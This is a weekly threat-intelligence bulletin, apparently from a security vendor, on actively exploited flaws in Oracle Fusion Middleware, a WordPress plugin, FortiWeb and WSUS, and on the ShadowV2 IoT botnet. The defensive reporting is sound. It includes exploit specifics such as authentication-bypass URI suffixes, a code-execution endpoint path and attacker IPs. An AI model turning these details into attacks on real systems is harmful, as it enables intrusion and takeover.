This week’s threat landscape underscored a sustained rise in active exploitation across enterprise platforms, web applications, and IoT infrastructure. CISA added a critical flaw from Oracle Fusion Middleware to its Known Exploited Vulnerabilities (KEV) catalog, while active exploitation was observed targeting the Sneeit Framework WordPress plugin. Meanwhile, vulnerabilities affecting Fortinet FortiWeb that were added to the KEV list last week continued to draw attacker focus.

Botnet operators such as EnemyBot, Sysrv-k, Andoryu, and Andorxgh0st intensified campaigns against exposed cloud services, routers, and web applications, capitalizing on configuration gaps and delayed patching.  

Additionally, ASEC reported use of a WSUS vulnerability to deploy ShadowPad malware, and Fortinet observed the ShadowV2 Mirai-based botnet leveraging IoT devices during the AWS outage, signaling growing sophistication in infrastructure-level exploitation.

Key points:

• One new vulnerability was added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting recent exploitation activity.
• Active Exploitation detected in Sneeit Framework WordPress plugin vulnerability.  ‍
• Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.  ‍
• 9 vulnerabilities were identified as being exploited by active botnet campaigns, indicating weaponization by threat actors.  ‍
• Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2025-61757 – Missing Authentication for Critical Function Vulnerability in Oracle Fusion Middleware

A Missing Authentication for Critical Function Vulnerability in Oracle Fusion Middleware affects versions 12.2.1.4.0 and 14.1.2.1.0, allowing unauthenticated attackers to gain control of Identity Manager by manipulating API endpoint access using URI modifications such as “?WSDL” or “;.wadl.” The flaw stems from weak regular expression-based filtering and can be chained with a request to the “/iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus” endpoint to achieve remote code execution through compilation-time execution of malicious Groovy annotations. Honeypot telemetry recorded multiple exploitation attempts between August 30 and September 9, 2025, with activity traced to IPs 89.238.132[.]76, 185.245.82[.]81, and 138.199.29[.]153, suggesting possible zero-day use prior to Oracle’s patch in October 2025. The vulnerability has been recently added to the CISA KEV catalog.  

CVE-2025-6389  - Unauthenticated Remote Code Execution Vulnerability in Sneeit Framework

An Unauthenticated Remote Code Execution Vulnerability affects the Sneeit Framework WordPress plugin in versions up to and including 8.3, enabling attackers to execute arbitrary code on the server without requiring login. The issue lies in the sneeit_articles_pagination_callback() function, which passes user-controlled input directly to PHP’s call_user_func(), allowing actions such as webshell deployment, creation of rogue administrator accounts, modification of theme files, and full site takeover. The Sneeit Framework, widely used by premium themes including the popular FlatNews, was patched in version 8.4. Wordfence reported blocking 3,079 exploitation attempts in the past 24 hours, highlighting the urgent need for users to update immediately.  

CVE-2025-58034 - OS Command Injection Vulnerability in Fortinet FortiWeb

An OS Command Injection Vulnerability in Fortinet FortiWeb affecting versions 8.0.0 to 8.0.1, 7.6.0 to 7.6.5, 7.4.0 to 7.4.10, 7.2.0 to 7.2.11 and 7.0.0 to 7.0.11 allows authenticated attackers to execute unauthorized code on the underlying system through crafted HTTP requests or CLI commands. According to Fortinet, this low-complexity flaw requires no user interaction and has already seen active exploitation. While authentication is required, the risk is significantly elevated in environments relying on shared admin credentials, weak passwords, or external access integrations. Successful exploitation may result in full administrative takeover, persistent backdoor installation, manipulation of web traffic, lateral movement within protected networks, and exfiltration of sensitive data. The vulnerability has been added to the CISA KEV catalog, and Fortinet has released upgraded versions to address it.

CVE-2025-64446 - Path Traversal Vulnerability in Fortinet FortiWeb

A Path Traversal Vulnerability in Fortinet FortiWeb affecting 8.0.0 to 8.0.1, 7.6.0 to 7.6.4, 7.4.0 to 7.4.9, 7.2.0 to 7.2.11 and 7.0.0 to 7.0.11 allows unauthenticated attackers to execute administrative commands via crafted HTTP or HTTPS requests. First observed in early October 2025 through live exploitation of a FortiWeb honeypot, the flaw has been actively abused to create privileged accounts, with public proof of concepts demonstrating reliable impact. Analysis confirmed the vulnerability stems from a combination of path traversal and authentication bypass techniques. Fortinet has issued upgraded versions to address the issues, which has now been added to the CISA KEV catalog. Exploitation continues in the wild, highlighting the urgency of patch deployment.

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.

CVE-2025-59287

According to AhnLab Security Intelligence Center (ASEC), threat actors have exploited a remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS) to distribute ShadowPad malware, a remote access trojan commonly used by Chinese APT groups. The flaw, identified as CVE-2025-59287 and patched by Microsoft last month, is a critical deserialization issue that enables attackers to gain system-level access to publicly exposed WSUS servers. Attackers have leveraged the vulnerability to execute utilities such as “curl.exe” and “certutil.exe” to download ShadowPad from an external server, following reconnaissance and initial access. The exploit was rapidly weaponized after proof-of-concept code became publicly available and remains under active exploitation. The activity has not yet been attributed to a specific threat actor.  

ShadowV2 Botnet Exploits IoT Weaknesses During AWS Outage

According to Fortinet’s FortiGuard Labs, a Mirai-based botnet known as ShadowV2 surfaced during last October’s widespread AWS outage, infecting IoT devices across multiple industries and regions in what appears to have been a potential test operation. The malware enabled attackers to remotely control compromised devices and conduct large-scale DDoS attacks, though activity was limited to the duration of the outage. ShadowV2 spread through vulnerabilities affecting devices from vendors such as  

• DD-WRT - CVE-2009-2765 ‍
• D-Link - CVE-2020-25506, CVE-2022-37055, CVE-2024-10914, CVE-2024-10915 ‍
• DigiEver - CVE-2023-52163 ‍
• TBK - CVE-2024-3721 ‍
• TP-Link - CVE-2024-53375

and impacted sectors including technology, manufacturing, retail, hospitality, government, telecommunications, and managed security services across 28 countries. The attacks, traced to the IP address 198[.]199[.]72[.]27, targeted routers, NAS devices, and DVRs, highlighting the ongoing risk posed by exposed IoT infrastructure.  

ShadowV2 infections spanned 28 countries, including United States, Canada, Mexico, Brazil, UK, France, Germany, Italy, Netherlands, Belgium, Czechia, Austria, Croatia, Greece, Turkey, Russia, China, Japan, Taiwan, Thailand, Philippines, Australia, Saudi Arabia, Egypt, South Africa, Morocco, Bolivia, and Chile.

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

1) How are attackers leveraging IoT devices in large-scale campaigns?

A) Attackers are increasingly exploiting exposed IoT assets such as routers, NAS systems, and DVRs to build botnets, conduct reconnaissance, and launch DDoS attacks, due to their widespread deployment and limited monitoring.  

2) What should organizations do if critical devices are end-of-life (EOL)?

A) If devices are EOL, they should be isolated from public networks, replaced with supported hardware, or secured through strict access controls and network segmentation to reduce the risk of exploitation.

3) What does “PoC available” mean, and why does it increase risk for a vulnerability?

A) “PoC available” means a working exploit for the vulnerability has been publicly released, proving it can be abused. This helps defenders test and validate fixes, but it also gives attackers a ready-made blueprint, often leading to rapid and widespread exploitation if systems remain unpatched.  

4) What does inclusion in the CISA KEV catalog indicate about a vulnerability’s risk level?  

A) When a vulnerability is added to the CISA KEV catalog, it signifies that it is being actively exploited in real-world attacks and poses a serious, immediate risk. CISA includes only confirmed exploited vulnerabilities in this list to ensure organizations focus on patching the most dangerous threats first. Being listed means the flaw demands urgent remediation to prevent compromise across government and enterprise environments.